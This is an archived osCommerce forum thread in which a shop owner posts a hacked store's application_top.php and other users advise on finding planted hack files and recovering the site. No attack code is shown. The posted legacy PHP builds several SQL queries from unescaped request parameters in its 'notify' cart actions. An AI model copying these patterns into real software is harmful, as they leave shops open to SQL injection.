. 'database_tables.php'); // include the IP Trap require(DIR_WS_INCLUDES . 'secret.php'); // customization for the design layout define('BOX_WIDTH', 190); // how wide the boxes should be in pixels (default: 125) define('BOX_WIDTH_RIGHT', 163); // how wide the boxes should be in pixels (default: 125) // include the database functions require(DIR_WS_FUNCTIONS . 'database.php'); // make a connection to the database... now tep_db_connect() or die('Unable to connect to database server!'); // set the application parameters $configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION); while ($configuration = tep_db_fetch_array($configuration_query)) { define($configuration['cfgKey'], $configuration['cfgValue']); } // FWR Media Security Pro if ( defined('FWR_SECURITY_PRO_ON') && FWR_SECURITY_PRO_ON === 'true' ) { $fwr_security_excludes = array(); if ( defined('FWR_SECURITY_PRO_FILE_EXCLUSIONS_ON') && FWR_SECURITY_PRO_FILE_EXCLUSIONS_ON === 'true' ) $fwr_security_excludes = explode(',', FWR_SECURITY_PRO_FILE_EXCLUSIONS); if ( !in_array(basename($_SERVER['PHP_SELF']), $fwr_security_excludes) ) include('includes/functions/security.php'); } if ( function_exists('tep_clean_get__recursive') ) { // Recursively clean $HTTP_GET_VARS and $_GET // There is no legitimate reason for these to contain anything but .. // A-Z a-z 0-9 -(hyphen).(dot)_(underscore) {} space $HTTP_GET_VARS = tep_clean_get__recursive($HTTP_GET_VARS); $_GET = tep_clean_get__recursive($_GET); $_REQUEST = $_GET + $_POST; // $_REQUEST now holds the cleaned $_GET and std $_POST. $_COOKIE has been removed. fwr_clean_global($_GET); // Change the $GLOBALS value to the cleaned value } // END - FWR Media Security Pro // if gzip_compression is enabled, start to buffer the output if ( (GZIP_COMPRESSION == 'true') && ($ext_zlib_loaded = extension_loaded('zlib')) && (PHP_VERSION >= '4') ) { if (($ini_zlib_output_compression = (int)ini_get('zlib.output_compression')) < 1) { if (PHP_VERSION >= '4.0.4') { ob_start('ob_gzhandler'); } else { include(DIR_WS_FUNCTIONS . 'gzip_compression.php'); ob_start(); ob_implicit_flush(); } } else { ini_set('zlib.output_compression_level', GZIP_LEVEL); } } // set the HTTP GET parameters manually if search_engine_friendly_urls is enabled if (SEARCH_ENGINE_FRIENDLY_URLS == 'true') { if (strlen(getenv('PATH_INFO')) > 1) { $GET_array = array(); $PHP_SELF = str_replace(getenv('PATH_INFO'), '', $PHP_SELF); $vars = explode('/', substr(getenv('PATH_INFO'), 1)); for ($i=0, $n=sizeof($vars); $i<$n; $i++) { if (strpos($vars[$i], '[]')) { $GET_array[substr($vars[$i], 0, -2)][] = $vars[$i+1]; } else { $HTTP_GET_VARS[$vars[$i]] = $vars[$i+1]; } $i++; } if (sizeof($GET_array) > 0) { while (list($key, $value) = each($GET_array)) { $HTTP_GET_VARS[$key] = $value; } } } } // define general functions used application-wide require(DIR_WS_FUNCTIONS . 'general.php'); require(DIR_WS_FUNCTIONS . 'html_output.php'); // set the cookie domain $cookie_domain = (($request_type == 'NONSSL') ? HTTP_COOKIE_DOMAIN : HTTPS_COOKIE_DOMAIN); $cookie_path = (($request_type == 'NONSSL') ? HTTP_COOKIE_PATH : HTTPS_COOKIE_PATH); // include cache functions if enabled if (USE_CACHE == 'true') include(DIR_WS_FUNCTIONS . 'cache.php'); // include shopping cart class require(DIR_WS_CLASSES . 'shopping_cart.php'); // include navigation history class require(DIR_WS_CLASSES . 'navigation_history.php'); // check if sessions are supported, otherwise use the php3 compatible session class if (!function_exists('session_start')) { define('PHP_SESSION_NAME', 'osCsid'); define('PHP_SESSION_PATH', $cookie_path); define('PHP_SESSION_DOMAIN', $cookie_domain); define('PHP_SESSION_SAVE_PATH', SESSION_WRITE_DIRECTORY); include(DIR_WS_CLASSES . 'sessions.php'); } // define how the session functions will be used require(DIR_WS_FUNCTIONS . 'sessions.php'); // set the session name and save path tep_session_name('osCsid'); tep_session_save_path(SESSION_WRITE_DIRECTORY); // set the session cookie parameters if (function_exists('session_set_cookie_params')) { session_set_cookie_params(0, $cookie_path, $cookie_domain); } elseif (function_exists('ini_set')) { ini_set('session.cookie_lifetime', '0'); ini_set('session.cookie_path', $cookie_path); ini_set('session.cookie_domain', $cookie_domain); } // set the session ID if it exists if (isset($HTTP_POST_VARS[tep_session_name()])) { tep_session_id($HTTP_POST_VARS[tep_session_name()]); } elseif ( ($request_type == 'SSL') && isset($HTTP_GET_VARS[tep_session_name()]) ) { tep_session_id($HTTP_GET_VARS[tep_session_name()]); } // start the session $session_started = false; if (SESSION_FORCE_COOKIE_USE == 'True') { tep_setcookie('cookie_test', 'please_accept_for_session', time()+60*60*24*30, $cookie_path, $cookie_domain); if (isset($HTTP_COOKIE_VARS['cookie_test'])) { tep_session_start(); $session_started = true; } } elseif (SESSION_BLOCK_SPIDERS == 'True') { $user_agent = strtolower(getenv('HTTP_USER_AGENT')); $spider_flag = false; if (tep_not_null($user_agent)) { $spiders = file(DIR_WS_INCLUDES . 'spiders.txt'); for ($i=0, $n=sizeof($spiders); $i<$n; $i++) { if (tep_not_null($spiders[$i])) { if (is_integer(strpos($user_agent, trim($spiders[$i])))) { $spider_flag = true; break; } } } } if ($spider_flag == false) { tep_session_start(); $session_started = true; } } else { tep_session_start(); $session_started = true; } if ( ($session_started == true) && (PHP_VERSION >= 4.3) && function_exists('ini_get') && (ini_get('register_globals') == false) ) { extract($_SESSION, EXTR_OVERWRITE+EXTR_REFS); } // set SID once, even if empty $SID = (defined('SID') ? SID : ''); // verify the ssl_session_id if the feature is enabled if ( ($request_type == 'SSL') && (SESSION_CHECK_SSL_SESSION_ID == 'True') && (ENABLE_SSL == true) && ($session_started == true) ) { $ssl_session_id = getenv('SSL_SESSION_ID'); if (!tep_session_is_registered('SSL_SESSION_ID')) { $SESSION_SSL_ID = $ssl_session_id; tep_session_register('SESSION_SSL_ID'); } if ($SESSION_SSL_ID != $ssl_session_id) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_SSL_CHECK)); } } // verify the browser user agent if the feature is enabled if (SESSION_CHECK_USER_AGENT == 'True') { $http_user_agent = getenv('HTTP_USER_AGENT'); if (!tep_session_is_registered('SESSION_USER_AGENT')) { $SESSION_USER_AGENT = $http_user_agent; tep_session_register('SESSION_USER_AGENT'); } if ($SESSION_USER_AGENT != $http_user_agent) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_LOGIN)); } } // verify the IP address if the feature is enabled if (SESSION_CHECK_IP_ADDRESS == 'True') { $ip_address = tep_get_ip_address(); if (!tep_session_is_registered('SESSION_IP_ADDRESS')) { $SESSION_IP_ADDRESS = $ip_address; tep_session_register('SESSION_IP_ADDRESS'); } if ($SESSION_IP_ADDRESS != $ip_address) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_LOGIN)); } } // create the shopping cart & fix the cart if necesary if (tep_session_is_registered('cart') && is_object($cart)) { if (PHP_VERSION < 4) { $broken_cart = $cart; $cart = new shoppingCart; $cart->unserialize($broken_cart); } } else { tep_session_register('cart'); $cart = new shoppingCart; } // include currencies class and create an instance require(DIR_WS_CLASSES . 'currencies.php'); $currencies = new currencies(); // include the mail classes require(DIR_WS_CLASSES . 'mime.php'); require(DIR_WS_CLASSES . 'email.php'); // set the language if (!tep_session_is_registered('language') || isset($HTTP_GET_VARS['language'])) { if (!tep_session_is_registered('language')) { tep_session_register('language'); tep_session_register('languages_id'); } include(DIR_WS_CLASSES . 'language.php'); $lng = new language(); if (isset($HTTP_GET_VARS['language']) && tep_not_null($HTTP_GET_VARS['language'])) { $lng->set_language($HTTP_GET_VARS['language']); } else { $lng->get_browser_language(); } $language = $lng->language['directory']; $languages_id = $lng->language['id']; } // include the language translations require(DIR_WS_LANGUAGES . $language . '.php'); // Ultimate SEO URLs v2.2d if ((!defined(SEO_ENABLED)) || (SEO_ENABLED == 'true')) { include_once(DIR_WS_CLASSES . 'seo.class.php'); if ( !is_object($seo_urls) ){ $seo_urls = new SEO_URL($languages_id); } } // currency if (!tep_session_is_registered('currency') || isset($HTTP_GET_VARS['currency']) || ( (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') && (LANGUAGE_CURRENCY != $currency) ) ) { if (!tep_session_is_registered('currency')) tep_session_register('currency'); if (isset($HTTP_GET_VARS['currency']) && $currencies->is_set($HTTP_GET_VARS['currency'])) { $currency = $HTTP_GET_VARS['currency']; } else { $currency = (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') ? LANGUAGE_CURRENCY : DEFAULT_CURRENCY; } } // navigation history if (tep_session_is_registered('navigation')) { if (PHP_VERSION < 4) { $broken_navigation = $navigation; $navigation = new navigationHistory; $navigation->unserialize($broken_navigation); } } else { tep_session_register('navigation'); $navigation = new navigationHistory; } $navigation->add_current_page(); // Shopping cart actions if (isset($HTTP_GET_VARS['action'])) { // redirect the customer to a friendly cookie-must-be-enabled page if cookies are disabled if ($session_started == false) { tep_redirect(tep_href_link(FILENAME_COOKIE_USAGE)); } if (DISPLAY_CART == 'true') { $goto = FILENAME_SHOPPING_CART; $parameters = array('action', 'cPath', 'products_id', 'pid'); } else { $goto = basename($PHP_SELF); if ($HTTP_GET_VARS['action'] == 'buy_now') { $parameters = array('action', 'pid', 'products_id'); } else { $parameters = array('action', 'pid'); } } switch ($HTTP_GET_VARS['action']) { // customer wants to update the product quantity in their shopping cart case 'update_product' : for ($i=0, $n=sizeof($HTTP_POST_VARS['products_id']); $i<$n; $i++) { if (in_array($HTTP_POST_VARS['products_id'][$i], (is_array($HTTP_POST_VARS['cart_delete']) ? $HTTP_POST_VARS['cart_delete'] : array()))) { $cart->remove($HTTP_POST_VARS['products_id'][$i]); } else { if (PHP_VERSION < 4) { // if PHP3, make correction for lack of multidimensional array. reset($HTTP_POST_VARS); while (list($key, $value) = each($HTTP_POST_VARS)) { if (is_array($value)) { while (list($key2, $value2) = each($value)) { if (ereg ("(.*)\]\[(.*)", $key2, $var)) { $id2[$var[1]][$var[2]] = $value2; } } } } $attributes = ($id2[$HTTP_POST_VARS['products_id'][$i]]) ? $id2[$HTTP_POST_VARS['products_id'][$i]] : ''; } else { $attributes = ($HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]]) ? $HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]] : ''; } $cart->add_cart($HTTP_POST_VARS['products_id'][$i], $HTTP_POST_VARS['cart_quantity'][$i], $attributes, false); } } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; // customer adds a product from the products page case 'add_product' : if (isset($HTTP_POST_VARS['products_id']) && is_numeric($HTTP_POST_VARS['products_id'])) { //++++ QT Pro: Begin Changed code $attributes=array(); if (isset($HTTP_POST_VARS['attrcomb']) && (preg_match("/^\d{1,10}-\d{1,10}(,\d{1,10}-\d{1,10})*$/",$HTTP_POST_VARS['attrcomb']))) { $attrlist=explode(',',$HTTP_POST_VARS['attrcomb']); foreach ($attrlist as $attr) { list($oid, $oval)=explode('-',$attr); if (is_numeric($oid) && $oid==(int)$oid && is_numeric($oval) && $oval==(int)$oval) $attributes[$oid]=$oval; } } if (isset($HTTP_POST_VARS['id']) && is_array($HTTP_POST_VARS['id'])) { foreach ($HTTP_POST_VARS['id'] as $key=>$val) { if (is_numeric($key) && $key==(int)$key && is_numeric($val) && $val==(int)$val) $attributes=$attributes + $HTTP_POST_VARS['id']; } } $cart->add_cart($HTTP_POST_VARS['products_id'], $cart->get_quantity(tep_get_uprid($HTTP_POST_VARS['products_id'], $attributes))+1, $attributes); //++++ QT Pro: End Changed Code } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; // performed by the 'buy now' button in product listings and review page case 'buy_now' : if (isset($HTTP_GET_VARS['products_id'])) { if (tep_has_product_attributes($HTTP_GET_VARS['products_id'])) { tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['products_id'])); } else { $cart->add_cart($HTTP_GET_VARS['products_id'], $cart->get_quantity($HTTP_GET_VARS['products_id'])+1); } } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; case 'notify' : if (tep_session_is_registered('customer_id')) { if (isset($HTTP_GET_VARS['products_id'])) { $notify = $HTTP_GET_VARS['products_id']; } elseif (isset($HTTP_GET_VARS['notify'])) { $notify = $HTTP_GET_VARS['notify']; } elseif (isset($HTTP_POST_VARS['notify'])) { $notify = $HTTP_POST_VARS['notify']; } else { tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify')))); } if (!is_array($notify)) $notify = array($notify); for ($i=0, $n=sizeof($notify); $i<$n; $i++) { $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $notify[$i] . "' and customers_id = '" . $customer_id . "'"); $check = tep_db_fetch_array($check_query); if ($check['count'] < 1) { tep_db_query("insert into " . TABLE_PRODUCTS_NOTIFICATIONS . " (products_id, customers_id, date_added) values ('" . $notify[$i] . "', '" . $customer_id . "', now())"); } } tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify')))); } else { $navigation->set_snapshot(); tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL')); } break; case 'notify_remove' : if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['products_id'])) { $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'"); $check = tep_db_fetch_array($check_query); if ($check['count'] > 0) { tep_db_query("delete from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'"); } tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action')))); } else { $navigation->set_snapshot(); tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL')); } break; case 'cust_order' : if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['pid'])) { if (tep_has_product_attributes($HTTP_GET_VARS['pid'])) { tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['pid'])); } else { $cart->add_cart($HTTP_GET_VARS['pid'], $cart->get_quantity($HTTP_GET_VARS['pid'])+1); } } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; } } // include the who's online functions require(DIR_WS_FUNCTIONS . 'whos_online.php'); tep_update_whos_online(); // include the password crypto functions require(DIR_WS_FUNCTIONS . 'password_funcs.php'); // include validation functions (right now only email address) require(DIR_WS_FUNCTIONS . 'validations.php'); // split-page-results require(DIR_WS_CLASSES . 'split_page_results.php'); // infobox require(DIR_WS_CLASSES . 'boxes.php'); // auto activate and expire banners require(DIR_WS_FUNCTIONS . 'banner.php'); tep_activate_banners(); tep_expire_banners(); // auto expire special products require(DIR_WS_FUNCTIONS . 'specials.php'); tep_expire_specials(); // calculate category path if (isset($HTTP_GET_VARS['cPath'])) { $cPath = $HTTP_GET_VARS['cPath']; } elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) { $cPath = tep_get_product_path($HTTP_GET_VARS['products_id']); } else { $cPath = ''; } if (tep_not_null($cPath)) { $cPath_array = tep_parse_category_path($cPath); $cPath = implode('_', $cPath_array); $current_category_id = $cPath_array[(sizeof($cPath_array)-1)]; } else { $current_category_id = 0; } // include the breadcrumb class and start the breadcrumb trail require(DIR_WS_CLASSES . 'breadcrumb.php'); $breadcrumb = new breadcrumb; $breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER); $breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link(FILENAME_DEFAULT)); /*** Begin Header Tags SEO ***/ // add category names or the manufacturer name to the breadcrumb trail if (isset($cPath_array)) { for ($i=0, $n=sizeof($cPath_array); $i<$n; $i++) { $categories_query = tep_db_query("select categories_htc_title_tag from " . TABLE_CATEGORIES_DESCRIPTION . " where categories_id = '" . (int)$cPath_array[$i] . "' and language_id = '" . (int)$languages_id . "' LIMIT 1"); if (tep_db_num_rows($categories_query) > 0) { $categories = tep_db_fetch_array($categories_query); $breadcrumb->add($categories['categories_htc_title_tag'], tep_href_link(FILENAME_DEFAULT, 'cPath=' . implode('_', array_slice($cPath_array, 0, ($i+1))))); } else { break; } } } elseif (isset($_GET['manufacturers_id'])) { $manufacturers_query = tep_db_query("select manufacturers_htc_title_tag from " . TABLE_MANUFACTURERS_INFO . " where manufacturers_id = '" . (int)$_GET['manufacturers_id'] . "' AND languages_id = '" . (int)$languages_id . "' LIMIT 1"); if (tep_db_num_rows($manufacturers_query)) { $manufacturers = tep_db_fetch_array($manufacturers_query); $breadcrumb->add($manufacturers['manufacturers_htc_title_tag'], tep_href_link(FILENAME_DEFAULT, 'manufacturers_id=' . $_GET['manufacturers_id'])); } } // add the products name to the breadcrumb trail if (isset($_GET['products_id'])) { $products_query = tep_db_query("select pd.products_head_title_tag from " . TABLE_PRODUCTS . " p left join " . TABLE_PRODUCTS_DESCRIPTION . " pd on p.products_id = pd.products_id where p.products_id = '" . (int)$_GET['products_id'] . "' and pd.language_id ='" . (int)$languages_id . "' LIMIT 1"); if (tep_db_num_rows($products_query)) { $products = tep_db_fetch_array($products_query); $breadcrumb->add($products['products_head_title_tag'], tep_href_link(FILENAME_PRODUCT_INFO, 'cPath=' . $cPath . '&products_id=' . $_GET['products_id'])); } } /*** End Header Tags SEO ***/ // initialize the message stack for output messages require(DIR_WS_CLASSES . 'message_stack.php'); $messageStack = new messageStack; // set which precautions should be checked define('WARN_INSTALL_EXISTENCE', 'true'); define('WARN_CONFIG_WRITEABLE', 'true'); define('WARN_SESSION_DIRECTORY_NOT_WRITEABLE', 'true'); define('WARN_SESSION_AUTO_START', 'true'); define('WARN_DOWNLOAD_DIRECTORY_NOT_READABLE', 'true'); if ( (basename($PHP_SELF) != FILENAME_LOGIN) && (basename($PHP_SELF) != FILENAME_LOGOFF) && (basename($PHP_SELF) != FILENAME_CREATE_ACCOUNT) && (basename($PHP_SELF) != FILENAME_CREATE_ACCOUNT_SUCCESS) && (basename($PHP_SELF) != FILENAME_PASSWORD_FORGOTTEN)) { //$navigation->set_snapshot(); }?> Your help is much appreciated Donal Link to comment Share on other sites More sharing options...
germ Posted October 8, 2010 Share Posted October 8, 2010 That isn't what's on the server, Read what I asked for again. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
home_field Posted October 8, 2010 Author Share Posted October 8, 2010 That isn't what's on the server, Read what I asked for again. That is the file that i have up on the server.. Is it the source code no? Link to comment Share on other sites More sharing options...
germ Posted October 8, 2010 Share Posted October 8, 2010 That is the file that i have up on the server.. Is it the source code no? Trust me. The file on the server has hack code in it. Read it off the server and post the first 50 or 60 lines. What you posted DOES NOT match what's on the server. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
home_field Posted October 8, 2010 Author Share Posted October 8, 2010 Trust me. The file on the server has hack code in it. Read it off the server and post the first 50 or 60 lines. What you posted DOES NOT match what's on the server. I uploaded (FTP) the file again there and that is whats live a the minute.. I checked through file manager and the code matches.. Could the hacked code be in another file and directing to application_top.php Link to comment Share on other sites More sharing options...
germ Posted October 8, 2010 Share Posted October 8, 2010 When you uploaded it again you erased the hack code. I am sending you a PM about other possible hack files I saw. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
home_field Posted October 8, 2010 Author Share Posted October 8, 2010 When you uploaded it again you erased the hack code. I am sending you a PM about other possible hack files I saw. I removed two of them files and it seemed to have done the trick.. figures crossed. I found another install file in a payment module in admin... it looks very dodge i will delete it aswell.. Will i check incase there is other instances of these file.? Donal Link to comment Share on other sites More sharing options...
germ Posted October 8, 2010 Share Posted October 8, 2010 The awful truth is that once security has been compromised every file on the site is guilty until proven innocent by examination of it's contents. There may be other hack files lurking, or the contents of other files may have been altered. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
home_field Posted October 8, 2010 Author Share Posted October 8, 2010 The awful truth is that once security has been compromised every file on the site is guilty until proven innocent by examination of it's contents. There may be other hack files lurking, or the contents of other files may have been altered. I will go through each with a fine tooth cone to make sure no others have be changed.. I have installed those security contribution so hopefully i will stay secure.. thanks for all your help donal Link to comment Share on other sites More sharing options...
MrPhil Posted October 8, 2010 Share Posted October 8, 2010 If you've been hacked, your best recourse may be to erase every PHP file on your site, after saving the contents of the old configure.php files to the side. In fact, erase everything except product image files and any downloadable products. Reinstall the entire osC code set (copy in the files via FTP, not an install), and rebuild the configure.php files from their old data. Reinstall any add-ons you've been using. If your hacked version was 2.2 RC2 or RC2a, your database should be up to date. If you had an older version (2.2 MS2 or earlier, possibly 2.2 RC1), you should compare your database table structure and manually update your database to RC2a's definitions. While you're at it, prepare for the PHP 5.3 your host will eventually move to, by installing the add-on for "deprecated functions". Prepare for MySQL 5 by patching your code: http://www.oscommerce.com/forums/topic/335136-osc-and-mysql-5-1054-errors . You mentioned something about hunting BOMs. Some stupid editors "helpfully" insert a UTF-8 Byte Order Mark into a file when it's edited and it thinks you're in UTF-8 mode. This can cause "headers already sent" messages, but usually from line 1 of a file. They are visible only if your browser is put into non-UTF8 character encoding mode (e.g., Latin-1/ISO-8859-1), and so can be easy to overlook if you normally run in UTF-8 mode. Your browser should have a View > Character Set Encoding option -- try putting it into Latin-1 as you hunt for BOMs, and you'll see any magically pop up. Find an editor (or editor setting) that lets you remove the BOM and save the file without it. Finally, if you were hacked, consider that a hacker may have installed spyware such as password sniffers or keystroke loggers on your PC (the one used to administratively access your site). Do a spyware scan and cleanup on your PC, and then change all your passwords: site access, FTP, admin account, etc. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.